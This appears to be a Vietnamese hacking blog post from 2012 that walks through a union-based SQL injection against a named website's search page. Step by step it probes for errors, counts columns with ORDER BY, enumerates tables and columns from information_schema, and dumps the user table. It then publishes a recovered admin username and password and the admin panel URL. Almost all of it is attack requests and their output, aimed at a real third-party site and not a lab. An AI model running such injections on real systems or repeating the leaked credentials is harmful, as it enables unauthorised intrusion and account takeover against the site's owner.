Trang chủ » SQL Injection » Khai thác SQLI " Lầu Xanh "

25 thg 10, 2012

Khai thác SQLI " Lầu Xanh "


Đầu tiên:


http://lauxanh.org/online/search.php?search_type=all&keyword=1603'

---> Báo lỗi 






http://lauxanh.org/online/search.php?search_type=all&keyword=1603'+order+by+26--+-

-->
Lỗi ta tiếp tục


http://lauxanh.org/online/search.php?search_type=all&keyword=1603'+order+by+25--+-

-->
ko lỗi suy ra có 25.
Giờ union:


http://lauxanh.org/online/search.php?search_type=all&keyword=1603%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20-

---> Lỗi cột số 3.


http://lauxanh.org/online/search.php?search_type=all&keyword=1603'%20union%20select%201,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.tables%20where%20table_schema=database()--%20-

->Hiện ra một đống bùi nhùi ....user,......


http://lauxanh.org/online/search.php?search_type=all&keyword=1603%27%20union%20select%201,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.columns%20where%20table_name=0x75736572--%20-

-->id,username,fullname,email,password,user_group


http://lauxanh.org/online/search.php?search_type=all&keyword=1603%27%20union%20select%201,2,group_concat%280x7c,id,0x7c,username,0x7c,fullname,0x7c,email,0x7c,password,0x7c,user_group%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20user--%20-

-->


|10|admin|ADMIN|phim88c

Link admin http://lauxanh.org/Ads/www/admin

nguồn: vnc
Nhãn:

Không có nhận xét nào:

Đăng nhận xét